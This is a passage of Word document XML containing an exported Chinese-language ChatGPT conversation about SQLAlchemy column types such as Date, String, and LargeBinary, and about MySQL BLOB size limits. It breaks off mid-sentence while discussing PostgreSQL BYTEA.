    <w:p w14:paraId="79C573DC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26FAC3EC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型来表示日期，这个类型对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型。所以你可以这样修改你的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3AF817" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A4C95DF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E6E3E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy import Date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75781F61" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C58CACB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># Other parts of your code...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15689FA5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69C144DF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>published_time = Column(Date)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C073D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F2E7C09" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这里，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>published_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段将会被存储为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型。请注意，这个类型只包含日期部分，不包含时间部分。如果你也需要存储时间，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DateTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45594D0C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DED8ECB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还要注意的是，当你使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DateTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的时候，你需要给这个字段传递</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>datetime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，而不是字符串。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8BB585" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23BF9CDD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F19358" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from datetime import date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AE4E44" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FD627D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># Other parts of your code...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB842CF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE7BA2A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>some_object.published_time = date.today()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDDDB96" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733DECEB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在上面的例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date.today()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回的是当前日期的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，这个对象可以直接赋值给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>published_time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B6F513" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE49D8F" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存多少字节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7D77F9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B708391" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56743208" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段的长度默认没有设置。在实际使用中，如果不设置长度，可能会根据后端数据库的行为有所不同。对于某些数据库，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你可能需要明确指定长度，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>String(64)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，表示这是一个长度为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字符串字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B04D86" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="009AE7BF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你的字段需要存储的字符串长度超过了定义时的长度，将会产生错误。因此，在定义字段的时候，需要根据实际需求来设定合适的长度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B94A99" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6FC2F9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你需要存储的字符串长度不确定，可能需要用到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TEXT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，这是一种可变长度的字符串类型，可以存储相对较长的字符串数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7697A544" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32AC279A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在处理字符串长度和数据库存储空间的问题时，你需要权衡数据的实际需求和数据库资源的使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11780934" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4505C397" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>blob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092D5E70" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C955A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284A6D0C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LargeBinary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型来存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段。这对应于数据库的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BYTEA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，可以用于存储二进制数据。以下是一个例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46268C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0041A3C0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7133BCE3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from sqlalchemy import Column, Integer, LargeBinary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E23CE3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A46B265" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>class YourClass(Base):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1536B60B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    __tablename__ = 'your_table'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF2864E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    id = Column(Integer, primary_key=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69175505" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    data = Column(LargeBinary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F25963B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2001211D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这样，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段就被设置为了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型，可以存储二进制数据。在实际使用时，你可以将需要存储的二进制数据直接赋给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66601A8B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE72B81" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要注意的是，不同数据库对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型的处理可能会有所不同，因此你需要根据你实际使用的数据库的文档来具体设置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327CA1A5" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252101A" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LargeBinary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以存储多大的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5140BB7E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B65A8F7" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="460FDD8D" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LargeBinary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型用于存储二进制大对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> (BLOB)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，实际上可以存储非常大的数据。其大小限制通常取决于你所使用的数据库管理系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B3518C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4C5435" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型最大可以存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>64KB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MEDIUMBLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>16MB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LONGBLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则可以存储达到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4GB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BLOB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（或者被称为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BYTEA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
